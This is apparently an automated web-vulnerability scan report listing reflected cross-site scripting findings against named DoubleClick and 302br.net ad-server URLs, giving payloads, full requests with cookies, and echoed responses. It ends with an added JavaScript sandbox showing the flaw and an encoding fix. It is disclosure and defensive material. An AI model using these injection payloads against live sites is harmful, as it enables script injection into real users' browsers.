<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781383aa"-alert(1)-"6682829cf01&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2
...[SNIP]...

6.66. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e1fc"-alert(1)-"fb131e4ea40 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml5e1fc"-alert(1)-"fb131e4ea40&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:35 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml5e1fc"-alert(1)-"fb131e4ea40&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Thrilloftrade.tos%3Fo%3D2%26a%3DIVN%26%26cid%3DGENRET%3B877237%3B62579861%3B239944998%3B39989395");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

6.67. http://ad.doubleclick.net/adj/mcn.skynews.com.au/topstories [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mcn.skynews.com.au/topstories

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e433a'%3balert(1)//574f9c7b613 was submitted in the tile parameter. This input was echoed as e433a';alert(1)//574f9c7b613 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two caveats apply to this particular reflection point. First, as the response below shows, the string is the argument of a document.write('...') call: the ';' in the payload terminates the statement while the call's opening parenthesis is still unclosed, so the script as echoed is a syntax error rather than a running alert(1). An expression-form payload such as e433a'-alert(1)-'574f9c7b613, the same shape this report uses for the double-quoted contexts, keeps the call well-formed and does execute. Second, the response is served as application/x-javascript rather than as an HTML document, so a victim navigating directly to this URL sees plain text; the injected code runs only when an HTML page loads this URL as a script, which makes exploitability depend on an attacker being able to influence the tile value in such an ad tag.

Request

GET /adj/mcn.skynews.com.au/topstories;tile=e433a'%3balert(1)//574f9c7b613 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.skynews.com.au/topstories/article.aspx?id=607751
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 281
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 12:51:24 GMT
Expires: Mon, 02 May 2011 12:51:24 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afb/0/0/%2a/p;44306;0-0;0;38332742;31-1/1;0/0/0;;~okv=;tile=e433a';alert(1)//574f9c7b613;~sscs=%3f"><img src="http://s0.2
...[SNIP]...

6.68. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ec5c"-alert(1)-"d8956f93e59 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The first quotation mark in the payload closes the adsafeSrc string literal, alert(1) is then evaluated as the middle operand of the expression "..." - alert(1) - "...", and the second quotation mark reopens a literal that absorbs the remainder of the original value, so the object literal stays syntactically valid and the rest of the script still runs. Because this response is text/html with the reflection inside an inline <script> block, a victim who follows a crafted link executes the payload directly, with no need for a third-party page to include the URL as a script.

Request

GET /jsi/adi4ec5c"-alert(1)-"d8956f93e59/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:21 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44CBE5C1CD4C81E2545A0132A5269940; Path=/
Content-Length: 8066
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi4ec5c"-alert(1)-"d8956f93e59/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(f
...[SNIP]...

6.69. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b30c"-alert(1)-"9695098fb11 was submitted in REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsi/adi/N5047.Turn8b30c"-alert(1)-"9695098fb11/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5D4080B28D22805506B720B2933FF347; Path=/
Content-Length: 8066
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi/N5047.Turn8b30c"-alert(1)-"9695098fb11/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){v
...[SNIP]...

6.70. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9017c"-alert(1)-"80544c6b860 was submitted in REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsi/adi/N5047.Turn/B5053148.229017c"-alert(1)-"80544c6b860;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:23 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8C10D282C941C7DE63320B1BED106369; Path=/
Content-Length: 8066
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi/N5047.Turn/B5053148.229017c"-alert(1)-"80544c6b860;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";v
...[SNIP]...

6.71. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34676"-alert(1)-"f580a372d7e was submitted as the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsi/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;&34676"-alert(1)-"f580a372d7e=1 HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:19 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EDC7A16E161345630CC062C2A7C3EE22; Path=/
Content-Length: 8069
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;&34676"-alert(1)-"f580a372d7e=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=functi
...[SNIP]...

6.72. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 333cb"-alert(1)-"eeb14d1dc7a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that in the request below the scanner appended the payload to the end of the semicolon-delimited path segment rather than substituting it for the sz value 728x90; the reflection point is nevertheless the same adsafeSrc string literal as in the preceding entries, which echoes the full request path and query string.

Request

GET /jsi/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;333cb"-alert(1)-"eeb14d1dc7a HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:19 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=17BAEFDF7BE018231805D90804D77DC4; Path=/
Content-Length: 8066
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;333cb"-alert(1)-"eeb14d1dc7a",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function
...[SNIP]...

6.73. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.76705.9611.302br.net
Path:   /jss/adj/N1243.Glam.com/B5234896.7

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70c35"-alert(1)-"57f7527f91 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that this jss variant is served as text/javascript rather than as an HTML document, so a victim navigating directly to the URL does not execute the payload; the reflection is the same adsafeSrc string literal as in the text/html jsi responses above, but execution requires an HTML page that loads this URL as a script, so exploitation depends on an attacker-influenced value reaching the publisher's script tag rather than on a crafted link alone.

Request

GET /jss/adj70c35"-alert(1)-"57f7527f91/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 02 May 2011 13:09:43 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A93632FFBB17573BD469B7C9DA1DCC4; Path=/
Connection: keep-alive
Content-Length: 2698


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://celebrities.glam.com/",
   adsafeSrc : "http://ad.doubleclick.net.76705.9611.302br.net/fw/adj70c35"-alert(1)-"57f7527f91/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aip
...[SNIP]...

6.74. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.76705.9611.302br.net
Path:   /jss/adj/N1243.Glam.com/B5234896.7

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b70a"-alert(1)-"8de33777c29 was submitted in REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jss/adj/N1243.Glam.com8b70a"-alert(1)-"8de33777c29/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 02 May 2011 13:09:53 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AAE01386AF445880C5620A40C1F4B924; Path=/
Connection: keep-alive
Content-Length: 2698


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://celebrities.glam.com/",
   adsafeSrc : "http://ad.doubleclick.net.76705.9611.302br.net/fw/adj/N1243.Glam.com8b70a"-alert(1)-"8de33777c29/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D2011050205
...[SNIP]...

6.75. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.76705.9611.302br.net
Path:   /jss/adj/N1243.Glam.com/B5234896.7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82738"-alert(1)-"fe73189adbc was submitted in REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
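The following is an added example, not code from the XSS.CX report or from the DoubleClick/302br.net ad servers, that reproduces the two reflection contexts found in this section: the double-quoted adsafeSrc string literal of 6.68 through 6.75 and the single-quoted document.write argument of 6.67. The templates are stand-ins modelled on the response bodies quoted above (the shortened paths, the image URL and all helper names are this example's own), the payloads are the ones the report submitted in 6.68 and 6.67 plus an expression-form variant for the single-quoted context that this example adds, and the sandbox replaces alert() and document.write() with recording stubs so execution can be observed offline. It then shows the fix: emit the value through a JavaScript string-literal encoder (JSON.stringify plus escapes for '<', '>' and U+2028/U+2029) and, where the string is itself HTML markup, HTML-attribute-encode the value first.

```javascript
// Added example: models the vulnerable templating behind the responses in
// this section and its hardened form. Not the ad servers' real code; the
// helper names, shortened paths and image URL are this example's own.

const JSI_PREFIX = "http://ad.doubleclick.net.68327.9418.302br.net/fw";
const IMG_URL = "http://example.invalid/pixel.gif"; // placeholder, not from the report

// Context A (6.68 - 6.75): the request path is concatenated into a
// double-quoted JavaScript string literal inside an object literal.
function renderJsiVulnerable(path) {
  return 'var adsafeVisParams = {\n' +
         '   mode : "jsi",\n' +
         '   adsafeSrc : "' + JSI_PREFIX + path + '",\n' +
         '   debug : "false"\n' +
         '};';
}

// Context B (6.67): the tile value is concatenated into a single-quoted
// literal that is the argument of document.write(...).
function renderAdjVulnerable(tile) {
  return "document.write('<a target=\"_blank\" href=\"http://ad.doubleclick.net/click;~okv=;tile=" +
         tile + ";~sscs=%3f\"><img src=\"" + IMG_URL + "\"></a>');";
}

// Hardened encoder for the JavaScript-string context. JSON.stringify yields a
// valid literal with quotes, backslashes and control characters escaped; the
// extra replacements keep it safe inside an inline <script> block as well
// (no "</script>" break-out, no U+2028/U+2029 line terminators).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Encoder for the HTML attribute context nested inside context B's markup.
function htmlAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderJsiSafe(path) {
  return 'var adsafeVisParams = {\n' +
         '   mode : "jsi",\n' +
         '   adsafeSrc : ' + jsStringLiteral(JSI_PREFIX + path) + ',\n' +
         '   debug : "false"\n' +
         '};';
}

function renderAdjSafe(tile) {
  // Encode for the innermost context first (HTML attribute), then for the
  // outer one (JavaScript string literal).
  const html = '<a target="_blank" href="http://ad.doubleclick.net/click;~okv=;tile=' +
               htmlAttr(tile) + ';~sscs=%3f"><img src="' + IMG_URL + '"></a>';
  return "document.write(" + jsStringLiteral(html) + ");";
}

// Sandboxed execution: alert() and document.write() are replaced by stubs that
// record their arguments, so the result shows whether injected code ran.
// A parse failure is reported by name (e.g. "SyntaxError") instead of thrown.
function run(source) {
  const alerts = [];
  const writes = [];
  const fakeDocument = { write: (s) => writes.push(s) };
  try {
    const params = new Function("alert", "document",
      source + "\nreturn typeof adsafeVisParams === 'undefined' ? undefined : adsafeVisParams;"
    )((x) => alerts.push(x), fakeDocument);
    return { error: null, alerts, writes, adsafeSrc: params && params.adsafeSrc };
  } catch (e) {
    return { error: e.constructor.name, alerts, writes, adsafeSrc: undefined };
  }
}

// Payloads as submitted in the report (6.68 and 6.67), plus an expression-form
// variant for the single-quoted context that this example adds.
const PATH_PAYLOAD = '/adi4ec5c"-alert(1)-"d8956f93e59/N5047.Turn/B5053148.22;sz=728x90';
const TILE_SCANNER = "e433a';alert(1)//574f9c7b613";
const TILE_EXPR    = "e433a'-alert(1)-'574f9c7b613";

if (typeof require !== "undefined" && require.main === module) {
  console.log("A vulnerable:", run(renderJsiVulnerable(PATH_PAYLOAD)));
  console.log("A safe:      ", run(renderJsiSafe(PATH_PAYLOAD)));
  console.log("B scanner:   ", run(renderAdjVulnerable(TILE_SCANNER)));
  console.log("B expr:      ", run(renderAdjVulnerable(TILE_EXPR)));
  console.log("B safe:      ", run(renderAdjSafe(TILE_EXPR)));
}
```

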